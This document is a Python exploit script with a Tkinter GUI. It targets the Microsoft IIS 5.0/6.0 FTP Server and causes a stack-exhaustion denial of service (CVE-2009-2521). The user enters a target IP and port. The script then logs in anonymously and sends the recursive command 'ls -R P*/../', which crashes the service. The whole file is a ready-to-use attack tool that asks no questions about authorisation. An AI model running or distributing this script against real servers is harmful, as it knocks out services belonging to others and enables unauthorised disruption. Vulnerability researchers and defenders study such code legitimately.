#!/usr/bin/python # Exploit Title: Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service [GUI VERSION] # Exploit Author: D35m0nd142 # Date: 03/10/2012 # Vendor Homepage: http://www.iis.net/ # Tested on Ubuntu 12.04 # CVE: 2009-2521 # Special thanks to Kingcope from socket import * import sys import Tkinter import time def exploit(): sock=socket(AF_INET,SOCK_STREAM) ip1=ip.get() port1=port.get() username="ftp" passwd="[email protected]" sock.connect((ip1,port1)) sock.send("user %s\r\n" %username) print "[+]" + sock.recv(1024) sock.send("pass %s\r\n" %passwd) print "[+]" + sock.recv(1024) command="ls -R P*/../" sock.send("%s\r\n" %command) print sock.recv(1024) sock.close() time.sleep(2) exploited=Tkinter.Label(text="[+] Exploit sent [+]",bg="blue",fg="green").pack() root=Tkinter.Tk() root.title("* Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service *") root['bg']="black" ip_text=Tkinter.Label(text="IP Address :").pack() ip=Tkinter.StringVar() ip_entry=Tkinter.Entry(textvariable=ip).pack() port_text=Tkinter.Label(text="Port :").pack() port=Tkinter.IntVar() port_entry=Tkinter.Entry(textvariable=port).pack() exploit=Tkinter.Button(text="Exploit",command=exploit).pack() author=Tkinter.Label(text="Author: D35m0nd142 | https://twitter.com/D35m0nd142").pack(side='bottom') root.mainloop()